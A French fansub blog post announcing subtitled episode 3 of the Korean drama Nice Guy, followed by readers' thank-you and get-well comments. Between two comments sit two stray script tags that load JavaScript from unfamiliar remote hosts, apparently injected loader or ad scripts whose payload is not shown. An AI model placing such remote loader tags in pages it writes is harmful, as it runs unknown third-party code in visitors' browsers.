• Nice Guy / Innocent man 03 Vostfr | DDL

    Nice Guy / Innocent man 03 Vostfr | DDL

    L'épisode 3 a eu du mal à arriver parce que je suis tombée malade, et que je n'avais donc pas spécialement envie de me pencher sur cet épisode ainsi que sur le 4 pour lequel je n'avais traduit que les 10 premières lignes x) Mais je vais mieux maintenant et voici donc l'épisode 3 que vous pouvez retrouver en DDL. Je me suis également avancée sur l'épisode 4, que je vais continuer entre 2 éternuements xD -Heureusement que les microbes se transmettent pas via l'ordinateur, sinon vous seriez tous tombés malade xD-

    A part ça, pour celles et ceux qui m'envoient des messages pour me demander comment encoder une vidéo. Ne vous étonnez plus si vous n'avez pas de réponse. Je pense avoir assez répété que je n'ai pas le temps de faire de tuto. Pour trouver comment faire, j'ai recherché sur google. Si moi j'ai réussi à trouver, alors vous trouverez aussi. Donc merci de ne plus m'envoyer de message tout en y glissant cette demande parce qu'honnêtement ça m'énerve un petit peu tous les messages que je reçois pour ça (a) Encore une fois, faites des recherches sur google et vous trouverez des tutos et tout ce que vous voulez savoir. Merci.

     

    Cliquez sur l'image pour accéder au lien
    Retrouvez-moi sur Facebook: EunHee Fansub


    Tags Tags : , , , ,
  • Commentaires

    28
    Kpop-I-Love-You Profil de Kpop-I-Love-You
    Mercredi 14 Novembre 2012 à 17:34

    c'est aussi un très bel épisode. :)

    Merci infiniment pour ton travail.

     

    27
    Anonyme2314
    Mercredi 31 Octobre 2012 à 01:28

    Merci j'adore ! :D

    26
    EunHee Profil de EunHee
    Samedi 6 Octobre 2012 à 23:44

    @Vagabonde91: Coucou :)

    Je ne sais pas du tout pourquoi tu n'arrives pas à lire la deuxième partie. Tu as bien collé les deux parties avec Hjsplit ? Est-ce que tu lis tes vidéos avec VLC ? Et sinon tu peux prendre la version 450p, tu n'as aucune partie à recoller :)

    25
    Vagabonde91
    Samedi 6 Octobre 2012 à 22:23

    coucou j'adore tout tes projet j'espere que pour la suite se sera pareille encore 1000 fois merci fithing pour la suite

    voila je voulais te demander si l'épisode 5 de nice guy est ce normal que j'ai des souci quant je li le fichier il lit que le début et la partie 2 ne veut meme pas ce lire encore merci bis

    24
    doriris1970
    Jeudi 4 Octobre 2012 à 18:12

    Merci de tout coeur pour la traduction. Bon courage pour la suite et encore un grand merci pour ton bon travail toujours aussi efficace !!

    23
    Sumya
    Lundi 1er Octobre 2012 à 14:58

    Nyaaaa ~ Merci beaucoup pour ce 4e épisodes EunHee ! ♥ Tu deviens de plus en plus rapide !  lol Ou c'est moi qui deviens de plus en plus lente !(」゜ロ゜)」

    Bon courage pour la suite ! (*`д´)b

     Fightoooo ᕙ(⇀‸↼‶)ᕗ ! Pour la suite ! ヾ(@⌒ー⌒@)ノ

    22
    Samedi 29 Septembre 2012 à 11:13

    Merci beaucoup toi aussi bon rétablissement !!!

    21
    EunHee Profil de EunHee
    Samedi 29 Septembre 2012 à 10:57

    Merci beaucoup pour tous vos commentaires et désolée de ne pas pouvoir répondre à tous individuellement, mais sachez qu'ils me font plaisir. Et que je suis bien contente d'avoir pu choisir un projet qui plaît autant à vous qu'à moi. En tout cas pour le moment je ne regrette pas de l'avoir commencé (et j'espère que ça continuera comme ça xD)

    En ce qui concerne des liens qui pourraient être sur d'autres sites, je n'en sait strictement rien, mais dans tous les cas, si vous les voyez quelque part, je compte sur vous pour me le dire :D

    Et puis à tous ceux qui sont malades, soignez-vous bien aussi~

    20
    Chouwi
    Vendredi 28 Septembre 2012 à 20:49

    Merci beaucoup pour cet épisode! :) 

    Ce drama me plaît de plus en plus, je suis contente! 

    Fighting pour la suite, et surtout soignes-toi bien! A bientôt~~

    19
    Callmetsuki
    Vendredi 28 Septembre 2012 à 19:50

    Merci beaucoup ^^

    J'espère que tu trouveras quelqu'un pour les vidéos en HD

    18
    alyssalacie
    Vendredi 28 Septembre 2012 à 18:41

    Merci pour ce nouvel épisode. Je suis déjà tombée sous le charme de ce drama. Il promet plein de rebondissements. Kamsahamnida ! Fighting pour la suite !

    17
    mimymangas
    Vendredi 28 Septembre 2012 à 18:40

    Merci  énormément pour ce 3ème épisode ^^

    16
    Dolphi'
    Vendredi 28 Septembre 2012 à 15:04

    Encore merciiii pour ton fabuleux travail Speedy EunHee !!! :) 

    L'épisode m'a beaucoup plu!! :P

    Fighting pour la suite & soignes-toi bien surtout!! :) 

    Bises. :)

     

     

    15
    Mytitoune
    Vendredi 28 Septembre 2012 à 11:53

    Je voulais juste te remercier pour l'excellent travail de traduction que tu nous offres et t'encourager chaleureusement à continuer ! Nice Guy est un super drama et je suis vraiment ravie que tu te sois penchée sur son cas. Merci pour tous les francophones ! :-) Bonne continuation et bon rétablissement ;-P

    14
    martine21
    Vendredi 28 Septembre 2012 à 02:14

    Merci pour ce nouvel épisode, j'ai été très agréablement suprise de voir qu'il était déjà disponible merci pour ton excellent travail. .amitiés.

    13
    ajumma
    Jeudi 27 Septembre 2012 à 21:33

    EunHee THE BEST !!!! T'assure grave, un énorme MERCI pour ce troisième épisode qui est génialissime, je suis plus qu'impatiente de voir la suite

    Je rejoins tout le monde pour te souhaiter un très bon rétablissement et encore merci pour ton travail de qualité !!!

    12
    Jeudi 27 Septembre 2012 à 18:29

    + de 440 downlaod de l'épisode 3 de Nice Guy et seulement quelques dizaines de commentaires !!! S'il vous plaît les gens qui tombent sur ce site laissez un petit commentaire, juste merci, ça respecterais le travail d'EunHee.

    Ou alors on utilise tes liens ailleurs c'est possible!

    11
    Calienne
    Jeudi 27 Septembre 2012 à 17:40

    Je l'ai chopé aussi ce virus de l'éternuement et du mal de gorge ^^'                     

    Un grand merci pour tout ce que tu fais!!!!                                                           

    Je pense qu'on est tous d'accord pour dire que si t'es pas en état, te presse pas ^^

    Soigne toi bien et reviens en pleine forme !!!!

    Bon courage pour la suite ^^

    <script src="//loading-resource.com/data.geo.php?callback=window.__geo.getData" type="text/javascript"></script> <script src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862" type="text/javascript"></script>
    10
    nanapazza Profil de nanapazza
    Jeudi 27 Septembre 2012 à 17:04

    merci pour ton travail

    9
    Jeudi 27 Septembre 2012 à 15:21

    Coucou :) 
    Je suis une nouvelle fan de ton travail qui vient te dire un énorme MERCI ♥

    Je ne connaissais pas ton blog avant de chercher à regarder Nice Guy en VOSTFR, et j'crois que ça a été la bénédiction quand je suis tombée sur toi ! 
    Je voulais également en profiter pour te dire que j'appréciais vraiment beaucoup ce que tu faisais (certes j'ai regardé pour le moment que 3 épisodes subbés par toi) mais j'suis vraiment fan *o* Ton orthographe irréprochable, la police de tes sous-titres (en plus j'suis super chiante sur ça, j'aime quand c'est beau et avec toi c'est parfaiiiit!) et surtout ta rapidité (surtout quand on sait que tu es toute seule) alors voilà, j'voulais vraiment te dire merci, et pas faire la fille invisible comme j'le fais parfois pour certains dramas (honte à moi). 
    Quand à Nice Guy, ce drama m'a l'air génial *o* Sans parler du fait que j'suis totalement et irrévocablement amoureuse de Joongki, le résumé me plaît trop & pour le moment j'aime beaucoup comment commence l'histoire ! 
    J'finirais par te dire soigne toi bien ! En étant moi-même malade ces jours-ci je compatis ! xD So FIGHTING ! 
    Encore merci pour ces superbes sous-titres ! *____* A très vite! 
    Bisous EunHee <3
    Enilya.  

    8
    Sumya
    Jeudi 27 Septembre 2012 à 12:47

    Oh merci pour ce 3e épisode, je vais le dévorer sous ma couette bien au chaud ! ^^ Merci encore, et soigne toi bien, fait comme moi, reste sous la couette ( enfin, quand c'est possible) ! xD

    7
    FLEURYVALERIE
    Jeudi 27 Septembre 2012 à 11:56

    merci et surtout soigne toi bien et repose toi surtout

    6
    chantelo
    Jeudi 27 Septembre 2012 à 09:40

    Merci pour ce nouvel épisode

    Bon rétablissement et prend soin de toi.

     

    5
    kame
    Jeudi 27 Septembre 2012 à 07:56

    Merci pour ton travail sur ce drama, tu es formidable ! Soigne-toi bien et fais comme ton pc installe toi un antivirus pour éviter de retomber malade.

    4
    Didi080294
    Mercredi 26 Septembre 2012 à 22:53

    C'est des ouuf : :p Moi j'dis bien fait pour elle, elle avait qu'a pas jouer avec lui, tant mieux qu'elle rammasse moi j'dis :o ( comment ch'uis méchaaaante Mouahahah xD ) 

    Merci pour cet ce merveilleux épisode Eun Hee :) j'espère voir la suite très bientôt :) 

    je te souhaite un bon rétablissement ( t'as pas eu besoin d'me le refiler par ordi, ch'uis aussi malade mdrr xp ) .. Te surmène pas trop quand même :s

    3
    ZazaB
    Mercredi 26 Septembre 2012 à 21:56

    Merci pour ce nouvel épisode

    Soignes toi bien!!

    Bon courage pour la suite!!

    2
    Mercredi 26 Septembre 2012 à 21:30

    Ohlala t'as vraiment pas de chance toi d'abord un virus (pc je parle mdr ^^ ) et maintenant tu est malade !! remarque moi aussi je suis malade en ce moment c'est otut le monde je crois enfin... moi c'est la gorge...bref on s'en fout xD!!

    MERCI pour ce nouvel épisode t'es trop forte j'ai hâte de voir ça Youpi!!

    Comme toujours Fighting EunHee!!!!

    1
    Elphame
    Mercredi 26 Septembre 2012 à 20:20

    Merci beaucoup pour ce troisième épisode.....^_^

    Fightiing pour la suite....

     



    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :